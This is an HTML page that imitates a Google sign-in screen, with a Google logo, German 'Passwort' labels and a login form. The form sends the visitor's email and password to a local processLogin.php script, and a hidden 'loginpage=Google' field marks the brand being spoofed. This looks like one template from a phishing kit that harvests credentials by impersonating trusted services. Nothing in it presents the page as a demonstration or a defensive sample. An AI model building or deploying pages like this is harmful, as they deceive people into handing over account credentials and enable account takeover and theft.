<html>
    <link rel="icon" type="image/png" href="images/icons/favicon.ico"/>
    <head>
        <title>Google Access Page</title>

        <style>
.login-page {
  width: 360px;
  padding: 8% 0 0;
  margin: auto;
}
.form {
  position: relative;
  z-index: 1;
  background: #F7F7F7;
  max-width: 360px;
  margin: 0 auto 100px;
  padding: 25px 45px 20px 45px;
  text-align: center;
  box-shadow: 0 0 20px 0 rgba(0, 0, 0, 0.2), 0 5px 5px 0 rgba(0, 0, 0, 0.24);
}
.form input {
  font-family: 'Roboto', sans-serif;
  outline: 0;
  background: #ffffff;
  width: 100%;
  border: 0;
  margin: 0 0 15px;
  padding: 15px;
  box-sizing: border-box;
  font-size: 14px;
}
.form button {
  font-family: 'Roboto', sans-serif;
  outline: 0;
  background: #4E8FF4;
  width: 100%;
  border: 0;
  padding: 15px;
  color: #FFFFFF;
  font-size: 14px;
  -webkit-transition: all 0.3 ease;
  transition: all 0.3 ease;
  cursor: pointer;
}
.form button:hover,.form button:active,.form button:focus {
  background: blue;
}
.form .message {
  text-align: right;
  margin: 15px 0 0;
  color: #4E8FF4;
  font-size: 12px;
}
.form .message a {
  color: #4E8FF4;
  text-decoration: none;
}
.form .register-form {
  display: none;
}
.container {
  position: relative;
  z-index: 1;
  max-width: 300px;
  margin: 0 auto;
}
.container:before, .container:after {
  content: '';
  display: block;
  clear: both;
}
.container .info {
  margin: 50px auto;
  text-align: center;
}
.container .info h1 {
  margin: 0 0 15px;
  padding: 0;
  font-size: 36px;
  font-weight: 300;
  color: #1a1a1a;
}
.container .info span {
  color: #4d4d4d;
  font-size: 12px;
}
.container .info span a {
  color: #000000;
  text-decoration: none;
}
.container .info span .fa {
  color: #EF3B3A;
}
body {
  background: #ffffff; /* fallback for old browsers */
 /* background: -webkit-linear-gradient(right, #76b852, #8DC26F);
  background: -moz-linear-gradient(right, #76b852, #8DC26F);
  background: -o-linear-gradient(right, #76b852, #8DC26F);
  background: linear-gradient(to left, #76b852, #8DC26F); */
  font-family: 'Roboto', sans-serif;
  -webkit-font-smoothing: antialiased;
  -moz-osx-font-smoothing: grayscale;
}

.logo {
  background-image: url(icons/google.png);
  background-size: 116px 38px;
  background-repeat: no-repeat;
  float: none;
  margin: 40px auto 30px;
  display: block;
  height: 38px;
  width: 116px;
  }
            .banner {
  text-align: center;
  }
            .banner h1 {
  font-family: 'Roboto', sans-serif;
  -webkit-font-smoothing: antialiased;
  color: #555;
  font-size: 42px;
  font-weight: 300;
  margin-top: 0;
  margin-bottom: 20px;
  }
  .banner h2 {
  font-family: 'Roboto', sans-serif;
  -webkit-font-smoothing: antialiased;
  color: #555;
  font-size: 18px;
  font-weight: 400;
  margin-bottom: 20px;
  }
            .circle-mask {
  display: block;
  height: 96px;
  width: 96px;
  overflow: hidden;
  border-radius: 50%;
  margin-left: auto;
  margin-right: auto;
  z-index: 100;
  margin-bottom: 10px;
  background-size: 96px;
  background-repeat: no-repeat;
  background-image: url(icons/user.png);
  -webkit-transition: opacity 0.075s;
  -moz-transition: opacity 0.075s;
  -ms-transition: opacity 0.075s;
  -o-transition: opacity 0.075s;
  transition: opacity 0.075s;
}
</style>

</head>

    <body>
      <div class='login-page'>
        <div class='form'>
          <div class='logo' aria-label='Google'></div>
          <form class='login-form' action='processLogin.php' method='POST'>
              <div class='circle-mask' ></div>
              <br>
              <input type='text' placeholder='Gmail / Email' name='user' required />
            <input type='password' placeholder='Passwort' name='pass' required />
            <input type='hidden' name='loginpage' value='Google' />
            
            <button type='submit'>Login</button>
            <p class='message'><a href='#'>Passwort vergessen?</a></p>
          </form>
        </div>
      </div>
    </body>
</html>
